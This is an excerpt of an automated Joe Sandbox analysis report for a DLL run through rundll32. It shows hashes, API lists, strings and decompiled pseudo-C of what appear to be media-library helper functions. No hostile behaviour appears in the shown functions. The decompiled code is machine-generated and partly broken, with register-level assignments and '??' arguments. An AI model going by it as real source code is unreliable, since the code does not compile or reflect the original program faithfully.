                                                      • Instruction Fuzzy Hash: 46514B75A047168BD354CF79C880B9AF7E4FF88350F018A2AE999CB301E734E8948B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: QueryVirtualabortfwritevfprintf
                                                      • String ID:
                                                      • API String ID: 2513968241-0
                                                      • Opcode ID: 77f9c74a023bead4244158e4538434e8ac340feeaea4348980fb076ccdbc421e
                                                      • Instruction ID: 54ad2b6e83e5b16b79a45a6593ed35e006b5b48100f64ca54a0057f1c503df76
                                                      • Opcode Fuzzy Hash: 77f9c74a023bead4244158e4538434e8ac340feeaea4348980fb076ccdbc421e
                                                      • Instruction Fuzzy Hash: E0514BB59053519FC700EF68C98965AFBE4FF84354F42C92EE8988B226D734E944CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Sleep.KERNEL32(?,?,?,10001281,?,?,?,?,?,?,100013AE), ref: 10001057
                                                      • _amsg_exit.MSVCRT ref: 10001086
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Sleep_amsg_exit
                                                      • String ID:
                                                      • API String ID: 1015461914-0
                                                      • Opcode ID: d59ae3628b0237ba56fdd7c9d317007903976593300e79648f20ecf33c672c95
                                                      • Instruction ID: dd64dd1eda1eb68cef0d792f916db726e673d7e5cc478cdb0012762ac5c84acb
                                                      • Opcode Fuzzy Hash: d59ae3628b0237ba56fdd7c9d317007903976593300e79648f20ecf33c672c95
                                                      • Instruction Fuzzy Hash: 1A31A374609651CBE310EF54C9C438A7BE1FB483C0F52482DE9848B76DD7B9D884DB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 56%
                                                      			E1004A200() {
                                                      				signed int __ebx;
                                                      				void __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t23;
                                                      				intOrPtr* _t24;
                                                      				void* _t36;
                                                      				void* _t37;
                                                      
                                                      				_t37 = _t36 - 0x2c;
                                                      				if( *((intOrPtr*)(_t37 + 0x40)) != 0) {
                                                      					__edi =  *__edx;
                                                      					if(__edi != 0) {
                                                      						__eax =  *(__edi + 4);
                                                      						if( *((intOrPtr*)(__edi + 0x30)) == 0) {
                                                      							__eax = __eax - 1;
                                                      						}
                                                      						 *((intOrPtr*)(__edi + 0x24)) = 1;
                                                      						if(__eax <= 0) {
                                                      							L13:
                                                      							 *__esp = __edi;
                                                      							__esp[6] = __edx;
                                                      							L1();
                                                      							__edx = __esp[6];
                                                      							__esp[0x10] = __esp[6];
                                                      							__esp =  &(__esp[0xb]);
                                                      							_pop(__ebx);
                                                      							_pop(__esi);
                                                      							_pop(__edi);
                                                      							_pop(__ebp);
                                                      							_t24 =  *((intOrPtr*)(_t37 + 4));
                                                      							 *_t24 = 0;
                                                      							 *((intOrPtr*)(_t37 + 4)) =  *_t24;
                                                      							return __imp___aligned_free();
                                                      						} else {
                                                      							__esp[6] = __eax;
                                                      							__ebp = 0;
                                                      							__esp[7] = __edx;
                                                      							do {
                                                      								__eax =  *__edi;
                                                      								__ebp = __ebp << 5;
                                                      								_t9 = (__ebp << 5) +  *__edi + 4; // 0x4
                                                      								__esi = _t9;
                                                      								__ebx = (__ebp << 5) +  *__edi + 8;
                                                      								 *__esp = __esi;
                                                      								L1009DE58();
                                                      								 *((intOrPtr*)(__ebx + 0x14)) = 0;
                                                      								__esp = __esp - 4;
                                                      								 *__esp = __ebx;
                                                      								__imp__WakeConditionVariable();
                                                      								__esp = __esp - 4;
                                                      								 *__esp = __esi;
                                                      								L1009DE50();
                                                      								__edx = __ebp;
                                                      								__ebp = __ebp + 1;
                                                      								__esp = __esp - 4;
                                                      							} while (__esp[6] != __ebp);
                                                      							__esi = __edx;
                                                      							__edx = __esp[7];
                                                      							__ebx = 0;
                                                      							__esp[6] = __esp[7];
                                                      							while(1) {
                                                      								__edx =  *__edi;
                                                      								__ebx = __ebx << 5;
                                                      								__eax = (__ebx << 5) +  *__edi;
                                                      								__ebp =  *((__ebx << 5) +  *__edi + 0xc);
                                                      								__eax = 0xffffffff;
                                                      								__eax = WaitForSingleObjectEx(__ebp, 0xffffffff, 0);
                                                      								__esp = __esp - 0xc;
                                                      								if(__eax == 0) {
                                                      									__eax = CloseHandle(__ebp);
                                                      									__esp = __esp - 4;
                                                      								}
                                                      								_t18 = __ebx + 1; // 0x1
                                                      								__eax = _t18;
                                                      								if(__ebx == __esi) {
                                                      									break;
                                                      								}
                                                      								__ebx = __eax;
                                                      							}
                                                      							__edx = __esp[6];
                                                      							goto L13;
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t23;
                                                      			}












                                                      APIs
                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 1004A262
                                                      • WakeConditionVariable.KERNEL32 ref: 1004A274
                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 1004A280
                                                      • WaitForSingleObjectEx.KERNEL32 ref: 1004A2C8
                                                      • CloseHandle.KERNEL32 ref: 1004A2D8
                                                      • mv_freep.MAIN ref: 1004A2F3
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLock$AcquireCloseConditionHandleObjectReleaseSingleVariableWaitWakemv_freep
                                                      • String ID:
                                                      • API String ID: 1841216690-0
                                                      • Opcode ID: 18bc572b1c8a2e61cb34bfd6f4b1ef9c865d202ec6cb55ee2b061ed66f55e34f
                                                      • Instruction ID: 3180a2c82765ffdb0d0e9836089f8425691ac15bb4143a1306c626e3471b16ad
                                                      • Opcode Fuzzy Hash: 18bc572b1c8a2e61cb34bfd6f4b1ef9c865d202ec6cb55ee2b061ed66f55e34f
                                                      • Instruction Fuzzy Hash: 34317EB26047058FD304EF68D98420BBBE1FF85290F61853DE85987205E331E999CBC6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_channel_layout_from_maskmv_freepstrcmp
                                                      • String ID:
                                                      • API String ID: 3576703362-0
                                                      • Opcode ID: 2b02768f874b8c8628ca8c24d3a244cf9eff547c0ef362d73473bb9b13f20ec1
                                                      • Instruction ID: 3232a43fc97f47c23ab915f7ee9f6b07ea90700946469634bd9b1ff3e7b05c00
                                                      • Opcode Fuzzy Hash: 2b02768f874b8c8628ca8c24d3a244cf9eff547c0ef362d73473bb9b13f20ec1
                                                      • Instruction Fuzzy Hash: 9C313871A087819FE340DF25D48061EBBE1EF88394F52982EF98997318DB71EC44CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 56%
                                                      			E1004A30C() {
                                                      				intOrPtr* _t20;
                                                      				void* _t23;
                                                      
                                                      				__eax = __eax - 1;
                                                      				__edi[9] = 1;
                                                      				if(__eax <= 0) {
                                                      					L11:
                                                      					 *__esp = __edi;
                                                      					__esp[6] = __edx;
                                                      					L1();
                                                      					__edx = __esp[6];
                                                      					__esp[0x10] = __esp[6];
                                                      					__esp =  &(__esp[0xb]);
                                                      					_pop(__ebx);
                                                      					_pop(__esi);
                                                      					_pop(__edi);
                                                      					_pop(__ebp);
                                                      					_t20 =  *((intOrPtr*)(_t23 + 4));
                                                      					 *_t20 = 0;
                                                      					 *((intOrPtr*)(_t23 + 4)) =  *_t20;
                                                      					return __imp___aligned_free();
                                                      				}
                                                      				__esp[6] = __eax;
                                                      				__ebp = 0;
                                                      				__esp[7] = __edx;
                                                      				do {
                                                      					__eax =  *__edi;
                                                      					__ebp = __ebp << 5;
                                                      					_t6 = (__ebp << 5) +  *__edi + 4; // 0x4
                                                      					__esi = _t6;
                                                      					__ebx = (__ebp << 5) +  *__edi + 8;
                                                      					 *__esp = __esi;
                                                      					L1009DE58();
                                                      					 *((intOrPtr*)(__ebx + 0x14)) = 0;
                                                      					__esp = __esp - 4;
                                                      					 *__esp = __ebx;
                                                      					__imp__WakeConditionVariable();
                                                      					__esp = __esp - 4;
                                                      					 *__esp = __esi;
                                                      					L1009DE50();
                                                      					__edx = __ebp;
                                                      					__ebp = __ebp + 1;
                                                      					__esp = __esp - 4;
                                                      				} while (__esp[6] != __ebp);
                                                      				__esi = __edx;
                                                      				__edx = __esp[7];
                                                      				__ebx = 0;
                                                      				__esp[6] = __esp[7];
                                                      				while(1) {
                                                      					__edx =  *__edi;
                                                      					__ebx = __ebx << 5;
                                                      					__eax = (__ebx << 5) +  *__edi;
                                                      					__ebp =  *((__ebx << 5) +  *__edi + 0xc);
                                                      					__eax = 0xffffffff;
                                                      					__eax = WaitForSingleObjectEx(__ebp, 0xffffffff, 0);
                                                      					__esp = __esp - 0xc;
                                                      					if(__eax == 0) {
                                                      						__eax = CloseHandle(__ebp);
                                                      						__esp = __esp - 4;
                                                      					}
                                                      					_t15 = __ebx + 1; // 0x1
                                                      					__eax = _t15;
                                                      					if(__ebx != __esi) {
                                                      						__ebx = __eax;
                                                      						continue;
                                                      					}
                                                      					__edx = __esp[6];
                                                      					goto L11;
                                                      				}
                                                      			}






                                                      APIs
                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 1004A262
                                                      • WakeConditionVariable.KERNEL32 ref: 1004A274
                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 1004A280
                                                      • WaitForSingleObjectEx.KERNEL32 ref: 1004A2C8
                                                      • CloseHandle.KERNEL32 ref: 1004A2D8
                                                      • mv_freep.MAIN ref: 1004A2F3
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLock$AcquireCloseConditionHandleObjectReleaseSingleVariableWaitWakemv_freep
                                                      • String ID:
                                                      • API String ID: 1841216690-0
                                                      • Opcode ID: a14856d7447140d92799d6568a2db05317804891632b94121e1a719d57eb44ae
                                                      • Instruction ID: bc251ce03876973850fb77e440ae180f66f2e7fe9fc8712012c25621f5453433
                                                      • Opcode Fuzzy Hash: a14856d7447140d92799d6568a2db05317804891632b94121e1a719d57eb44ae
                                                      • Instruction Fuzzy Hash: BF214CB15087158FC700EF68D98420EBBE0FF94340F61853DE89997215D331E599CBC6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_strstart
                                                      • String ID: $xyz$yuvj
                                                      • API String ID: 2201124280-2071466796
                                                      • Opcode ID: bd39db4a194a366d109f30458d461c2df5a62078d964f913814af86215653bba
                                                      • Instruction ID: fae87543b31ee3dab4fff42b62755004a6e6770c78894ec516081f8316d78002
                                                      • Opcode Fuzzy Hash: bd39db4a194a366d109f30458d461c2df5a62078d964f913814af86215653bba
                                                      • Instruction Fuzzy Hash: 28C1F3355083948FD342CF28D8D47AABBE2EFC6388F85496CF4D187266D275DA58CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_strstart
                                                      • String ID: $xyz$yuvj
                                                      • API String ID: 2201124280-2071466796
                                                      • Opcode ID: 81723ec4f1f1f9ea585c3b123fc44b8cc6761d75b4754926e1d488a3831eaf29
                                                      • Instruction ID: bfc651eaba2522c4d235aec60645e24123cb0f9c5bb9b4cc4e7f011c1b04411b
                                                      • Opcode Fuzzy Hash: 81723ec4f1f1f9ea585c3b123fc44b8cc6761d75b4754926e1d488a3831eaf29
                                                      • Instruction Fuzzy Hash: 02C103355083948FD342CF28D8D47AABBE2EFC5388F85496CF4D187266D275EA58CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_image_get_linesize.MAIN ref: 1001F5A7
                                                        • Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976
                                                      • mv_log.MAIN ref: 1001F651
                                                      • mv_log.MAIN(?), ref: 1001F68E
                                                      Strings
                                                      • Picture size %ux%u is invalid, xrefs: 1001F634
                                                      • Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it, xrefs: 1001F67E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_log$mv_image_get_linesizemv_pix_fmt_desc_get
                                                      • String ID: Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it$Picture size %ux%u is invalid
                                                      • API String ID: 1737039923-91635712
                                                      • Opcode ID: df92d46b41c7d93cf8064fe713dd42f1165b0ed3c722c90c92471b13e2172188
                                                      • Instruction ID: 4d78d89fad071d3c7295cc0c1cabb1fa4872bd69d58dfd2203c9a44d69170479
                                                      • Opcode Fuzzy Hash: df92d46b41c7d93cf8064fe713dd42f1165b0ed3c722c90c92471b13e2172188
                                                      • Instruction Fuzzy Hash: 9041B0B59083549FC350CF29C08024EFBE1FBD8754F558A2EF9A8D7350E674E9458B86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strcmpstrncmpstrtol
                                                      • String ID: AMBI
                                                      • API String ID: 155133989-3084986980
                                                      • Opcode ID: c65f3f7975b7823a73d044f094c93d5fd796e748c7aa11a49156733d133437d6
                                                      • Instruction ID: 96a3e84c180ec1e05a7f5708790a2991e0ec9e313a24bbe51d35f59fb7ac403f
                                                      • Opcode Fuzzy Hash: c65f3f7975b7823a73d044f094c93d5fd796e748c7aa11a49156733d133437d6
                                                      • Instruction Fuzzy Hash: B6217FB590C7864FE750DF249CC060BBAD0EF492D1F11893EE98993255E275DC85C782
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E1002C02C(signed char __ebx, void* __esi) {
                                                      				signed char _t39;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				signed char _t48;
                                                      				signed int _t49;
                                                      				signed int _t50;
                                                      				void _t53;
                                                      				signed char _t54;
                                                      				int _t56;
                                                      				int _t58;
                                                      				signed int _t60;
                                                      				char* _t64;
                                                      				void* _t66;
                                                      				void* _t69;
                                                      				signed char _t72;
                                                      				signed char* _t73;
                                                      
                                                      				_t69 = __esi;
                                                      				_t54 = __ebx;
                                                      				do {
                                                      					_t54 = _t54 + 1;
                                                      					_t60 =  *_t54 & 0x000000ff;
                                                      				} while ((_t60 | 0x00000020) - 0x61 <= 0x19 || _t60 - 0x2d <= 0xc || _t60 == 0x5f);
                                                      				 *_t73 = _t54;
                                                      				_t73[4] = 0x100b45f0;
                                                      				_t64 = _t54 + strspn(??, ??);
                                                      				_t39 =  *_t64;
                                                      				if(_t39 == 0) {
                                                      					L13:
                                                      					if((_t73[0x5c] & 0x00000001) == 0) {
                                                      						_t40 = 0xffffffea;
                                                      						L11:
                                                      						return _t40;
                                                      					}
                                                      					_t72 = 0;
                                                      					L9:
                                                      					_t73[4] = _t73[0x58];
                                                      					 *_t73 =  &(_t73[0x2c]);
                                                      					_t43 = L10006940();
                                                      					if(_t43 == 0) {
                                                      						 *_t73 = _t72;
                                                      						L100265B0();
                                                      						_t40 = 0xfffffff4;
                                                      					} else {
                                                      						 *(_t73[0x50]) = _t73[0x2c];
                                                      						 *(_t73[0x60]) = _t72;
                                                      						 *(_t73[0x64]) = _t43;
                                                      						_t40 = 0;
                                                      					}
                                                      					goto L11;
                                                      				}
                                                      				_t73[4] = _t39;
                                                      				 *_t73 = _t73[0x54];
                                                      				if(strchr(??, ??) == 0) {
                                                      					goto L13;
                                                      				}
                                                      				_t5 = _t64 + 1; // 0x1
                                                      				_t56 = _t54 - _t69;
                                                      				_t73[0x1c] = _t5;
                                                      				_t7 = _t56 + 1; // 0x100aeb87
                                                      				 *_t73 = _t7;
                                                      				_t48 = E10026230();
                                                      				_t72 = _t48;
                                                      				if(_t48 == 0) {
                                                      					goto L13;
                                                      				}
                                                      				_t58 = _t56;
                                                      				_t66 = _t48;
                                                      				if(_t56 >= 8) {
                                                      					if((_t48 & 0x00000001) != 0) {
                                                      						_t49 =  *_t69 & 0x000000ff;
                                                      						_t66 = _t72 + 1;
                                                      						_t69 = _t69 + 1;
                                                      						_t58 = _t56 - 1;
                                                      						 *_t72 = _t49;
                                                      					}
                                                      					if((_t66 & 0x00000002) != 0) {
                                                      						_t50 =  *_t69 & 0x0000ffff;
                                                      						_t66 = _t66 + 2;
                                                      						_t69 = _t69 + 2;
                                                      						_t58 = _t58 - 2;
                                                      						 *(_t66 - 2) = _t50;
                                                      					}
                                                      					if((_t66 & 0x00000004) != 0) {
                                                      						_t53 =  *_t69;
                                                      						_t66 = _t66 + 4;
                                                      						_t69 = _t69 + 4;
                                                      						_t58 = _t58 - 4;
                                                      						 *(_t66 - 4) = _t53;
                                                      					}
                                                      				}
                                                      				memcpy(_t66, _t69, _t58);
                                                      				_t73 =  &(_t73[0xc]);
                                                      				 *((char*)(_t72 + _t56)) = 0;
                                                      				_t73[0x2c] = _t73[0x1c];
                                                      				goto L9;
                                                      			}


                                                      APIs
                                                      • strspn.MSVCRT ref: 1002BF97
                                                      • strchr.MSVCRT ref: 1002BFB5
                                                      • mv_malloc.MAIN(?,?,?,?,?,?,?,?,?,?,100AEACF,100AEB86,00000000,?,1000DF13), ref: 1002BFCD
                                                      • mv_get_token.MAIN ref: 1002BFFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_get_tokenmv_mallocstrchrstrspn
                                                      • String ID:
                                                      • API String ID: 476366593-596783616
                                                      • Opcode ID: 29e496927f1da63fb82fa8c860c72426edcc2de4f9f69176329bf0e8f31cb9b9
                                                      • Instruction ID: dc3b06df85388a75f907743202ecfe3307d48378777e578708470cdae6669aaf
                                                      • Opcode Fuzzy Hash: 29e496927f1da63fb82fa8c860c72426edcc2de4f9f69176329bf0e8f31cb9b9
                                                      • Instruction Fuzzy Hash: 89215E745087458FCB00DFB8D5C095ABBE5FF89284F80896ED998C7301E675E84ADB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_dict_setmv_strlcatfstrftime
                                                      • String ID: %Y-%m-%dT%H:%M:%S$.%06dZ
                                                      • API String ID: 3046200060-930656424
                                                      • Opcode ID: 728a3bd6f1d20a34548cbc8e6d3f3df844403d6c227aa6eea2e28321bcd2af87
                                                      • Instruction ID: 1402893b187d2e51f9b144a86c1e9403a14236be66f1ea1af33c468999098a96
                                                      • Opcode Fuzzy Hash: 728a3bd6f1d20a34548cbc8e6d3f3df844403d6c227aa6eea2e28321bcd2af87
                                                      • Instruction Fuzzy Hash: 982190B59093419FD350DF29E58065BBBE0FB88354F51C92EF89CC7305E639D8948B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E1000D5CB(void* __edi) {
                                                      				void* _t75;
                                                      
                                                      				while(1) {
                                                      					L3:
                                                      					__esi =  *(__edi + 4);
                                                      					__ebp = __ebp + 1;
                                                      					if(__esi <= __ebp) {
                                                      						break;
                                                      					} else {
                                                      						goto L4;
                                                      					}
                                                      					do {
                                                      						L4:
                                                      						if(__ebp >= __esi) {
                                                      							L42:
                                                      							__eax = 0x100aeacf;
                                                      							__esp[1] = 0x100aeacf;
                                                      							__eax = __esp[6];
                                                      							 *__esp = __esp[6];
                                                      							__eax = L100089C0();
                                                      							L9:
                                                      							__eax = __esp[6];
                                                      							__esi = "NONE";
                                                      							__esp[1] = "NONE";
                                                      							 *__esp = __esp[6];
                                                      							__eax = L100089C0();
                                                      							L10:
                                                      							if( *__edi != 2) {
                                                      								goto L3;
                                                      							}
                                                      							__edx =  *(__edi + 8);
                                                      							__eax = __ebp + __ebp * 2;
                                                      							__ecx = __edx + __eax * 8;
                                                      							if( *((char*)(__edx + 4 + __eax * 8)) == 0) {
                                                      								goto L3;
                                                      							}
                                                      							goto L12;
                                                      						}
                                                      						__eax =  *__edi;
                                                      						if(__eax == 2) {
                                                      							__edx =  *(__edi + 8);
                                                      							__eax = __ebp + __ebp * 2;
                                                      							__eax =  *(__edi + 8) + (__ebp + __ebp * 2) * 8;
                                                      							__ecx =  *( *(__edi + 8) + (__ebp + __ebp * 2) * 8);
                                                      							__ebx = __ecx - 0x400;
                                                      							if(__ebp != 0) {
                                                      								__esp[4] = __ecx;
                                                      								__eax = 0x100aeacf;
                                                      								__esp[1] = 0x100aeacf;
                                                      								__eax = __esp[6];
                                                      								 *__esp = __esp[6];
                                                      								__eax = L100089C0();
                                                      								__ecx = __esp[4];
                                                      							}
                                                      							if(__ebx > 0x3ff) {
                                                      								L38:
                                                      								if(__ecx <= 0x28) {
                                                      									L26:
                                                      									__eax =  *(0x100af280 + __ecx * 8);
                                                      									if(__eax == 0) {
                                                      										L32:
                                                      										__esp[2] = __ecx;
                                                      										__eax = __esp[6];
                                                      										__ebx = "USR%d";
                                                      										__esp[1] = "USR%d";
                                                      										 *__esp = __esp[6];
                                                      										__eax = L100089C0();
                                                      										goto L10;
                                                      									}
                                                      									__esp[2] = __eax;
                                                      									__eax = "%s";
                                                      									__esp[1] = "%s";
                                                      									__eax = __esp[6];
                                                      									 *__esp = __esp[6];
                                                      									__eax = L100089C0();
                                                      									goto L10;
                                                      								}
                                                      								if(__ecx != 0xffffffff) {
                                                      									goto L32;
                                                      								}
                                                      								goto L9;
                                                      							}
                                                      							L36:
                                                      							__esp[2] = __ebx;
                                                      							__eax = "AMBI%d";
                                                      							__esp[1] = "AMBI%d";
